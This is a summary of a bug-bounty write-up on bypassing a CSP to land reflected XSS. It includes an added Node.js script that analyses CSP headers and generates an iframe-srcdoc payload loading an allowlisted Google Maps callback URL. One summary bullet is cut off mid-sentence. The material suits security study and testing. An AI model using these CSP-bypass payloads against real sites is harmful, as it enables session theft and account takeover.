Summary

  • Young Bangladeshi Syed Mushfik Hasan Tahsin has shared an account of an unexpected roadblock he hit while trying to exploit a finding.
  • While investigating a target site, he found an input that was reflected back into the page unescaped, so his XSS payload came back intact.
  • Thinking he had scored an easy win, Tahsin was surprised to find that the site shipped a tight content security policy (CSP) which blocked the inline script, so the expected popup never fired.
  • Analysing the CSP, Tahsin found that, although the policy omitted the 'unsafe-inline' source keyword (so no inline script would run), it still permitted a Google Maps API endpoint from which he could load script, and that was enough to get his payload past the policy.
  • Even so, the payload would not execute: it turned out that the reflected value was being written into the page through the .innerHTML property, which renders the
  • The way around this was to wrap the <script> tag in an iframe's srcdoc attribute: the srcdoc document is parsed and executed normally, and because it is same-origin with the parent, the script could then reach the parent document and deliver the popup.
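As an added example (not code from the original write-up or from Tahsin), the following Node.js script triages a CSP header for the two conditions this story turns on, no usable 'unsafe-inline' and an allowlisted host from which attacker-influenced script can be loaded, and then builds the iframe srcdoc wrapper that survives an innerHTML sink. The sample header, the page origin and the callback-style Google Maps endpoint URL are constructed for illustration; the summary does not say which endpoint or parameter Tahsin actually used, so that part is an assumption.

```javascript
// Added example, not from the original write-up. Triages a CSP header for the
// conditions the story hinges on and builds an innerHTML-survivable payload.
// SAMPLE_CSP, PAGE_ORIGIN and ALLOWED_SCRIPT_URL are constructed for illustration.

const SAMPLE_CSP =
  "default-src 'self'; script-src 'self' https://maps.googleapis.com; object-src 'none'";
const PAGE_ORIGIN = "https://target.example";
// Assumed: a JSONP-style endpoint on the allowlisted host whose callback
// parameter ends up in the response body as executable code.
const ALLOWED_SCRIPT_URL = "https://maps.googleapis.com/maps/api/js?callback=alert";

// Parse a Content-Security-Policy header value into { directive: [sources] }.
// Directive names are case-insensitive; a repeated directive is ignored (first wins).
function parseCsp(header) {
  const policy = {};
  for (const raw of header.split(";")) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in policy)) policy[name] = tokens.slice(1);
  }
  return policy;
}

// Source list that governs script execution: script-src, else default-src.
function scriptSources(policy) {
  return policy["script-src"] || policy["default-src"] || [];
}

// Inline <script> runs only if 'unsafe-inline' is present AND no nonce/hash
// source is listed (CSP2+ browsers ignore 'unsafe-inline' next to a nonce or hash).
function allowsInlineScript(policy) {
  const srcs = scriptSources(policy).map((s) => s.toLowerCase());
  const hasNonceOrHash = srcs.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return srcs.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Would the effective script source list allow loading a script from `url`?
// Handles 'self' (relative to pageOrigin), '*', scheme sources ("https:") and
// host sources with an optional "*." wildcard. Path matching is skipped: good
// enough for triage, too loose for enforcement.
function scriptSrcAllows(policy, url, pageOrigin) {
  const u = new URL(url);
  for (const src of scriptSources(policy)) {
    const s = src.toLowerCase();
    if (s === "'self'") {
      if (u.origin === pageOrigin.toLowerCase()) return true;
      continue;
    }
    if (s.startsWith("'")) continue;          // other keywords, nonces, hashes
    if (s === "*") return true;
    if (s.endsWith(":")) {                    // scheme source, e.g. "https:"
      if (u.protocol === s) return true;
      continue;
    }
    let host = s.includes("://") ? s.split("://")[1] : s;
    host = host.split("/")[0].split(":")[0];  // drop path and port
    if (host.startsWith("*.")) {
      if (u.hostname.endsWith(host.slice(1))) return true;
    } else if (u.hostname === host) {
      return true;
    }
  }
  return false;
}

function escapeHtmlAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Reverse of escapeHtmlAttr: what the HTML parser sees inside the attribute.
function decodeHtmlAttr(s) {
  return s.replace(/&lt;/g, "<").replace(/&gt;/g, ">")
          .replace(/&quot;/g, '"').replace(/&amp;/g, "&");
}

// innerHTML creates the elements it is given but never executes a <script>
// it inserted. It does create <iframe>s, and a srcdoc document is parsed and
// run like any other document, so the <script> goes inside srcdoc. The srcdoc
// document inherits the parent's CSP, which is why the script src must still
// point at an allowlisted host rather than being inline.
function buildSrcdocPayload(scriptUrl) {
  const inner = `<script src="${escapeHtmlAttr(scriptUrl)}"></script>`;
  return `<iframe srcdoc="${escapeHtmlAttr(inner)}"></iframe>`;
}

// One-shot triage returning the facts a tester wants before building a payload.
function triage(header, pageOrigin, candidateScriptUrl) {
  const policy = parseCsp(header);
  const inline = allowsInlineScript(policy);
  const external = scriptSrcAllows(policy, candidateScriptUrl, pageOrigin);
  return {
    inlineScriptAllowed: inline,
    candidateHostAllowed: external,
    payload: !inline && external ? buildSrcdocPayload(candidateScriptUrl) : null,
  };
}

console.log(JSON.stringify(triage(SAMPLE_CSP, PAGE_ORIGIN, ALLOWED_SCRIPT_URL), null, 2));
```

The srcdoc document inherits both the parent's CSP and the parent's origin: the first is why the inner script still has to come from an allowlisted host, the second is why, once it runs, it can reach `parent.document` and fire the popup in the page under test. Note that the wrapper is entity-escaped twice by design, once for the outer attribute and once for the inner one, so an `&` in the script URL survives both decodes.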

By SMHTahsin33

Original Article